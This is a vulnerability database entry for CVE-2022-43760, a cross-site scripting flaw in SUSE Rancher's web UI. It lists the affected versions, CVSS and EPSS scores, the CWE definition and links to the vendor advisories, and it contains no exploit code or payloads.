Vulnerability Details : CVE-2022-43760
An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SUSE Rancher allows users in some higher-privileged groups to to inject code that is
executed within another user's browser, allowing the attacker to steal
sensitive information, manipulate web content, or perform other
malicious activities on behalf of the victims. This could result in a
user with write access to the affected areas being able to act on behalf
of an administrator, once an administrator opens the affected web page.
This issue affects Rancher: from >= 2.6.0 before < 2.6.13, from >= 2.7.0 before < 2.7.4.
Vulnerability category: Cross site scripting (XSS)
Products affected by CVE-2022-43760
- cpe:2.3:a:suse:rancher:*:*:*:*:*:*:*:*
- cpe:2.3:a:suse:rancher:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2022-43760
0.10%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 41 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2022-43760
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
8.4
|
HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H |
1.7
|
6.0
|
SUSE | |
8.4
|
HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H |
1.7
|
6.0
|
NIST |
CWE ids for CVE-2022-43760
-
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.Assigned by: meissner@suse.de (Primary)
References for CVE-2022-43760
-
https://bugzilla.suse.com/show_bug.cgi?id=CVE-2022-43760
1205292 – (CVE-2022-43760) VUL-0: CVE-2022-43760: Rancher: Multiple XSS issuesIssue Tracking;Vendor Advisory
-
https://github.com/rancher/rancher/security/advisories/GHSA-46v3-ggjg-qq3x
Multiple Cross-Site Scripting (XSS) issues in Rancher UI · Advisory · rancher/rancher · GitHubVendor Advisory
Jump to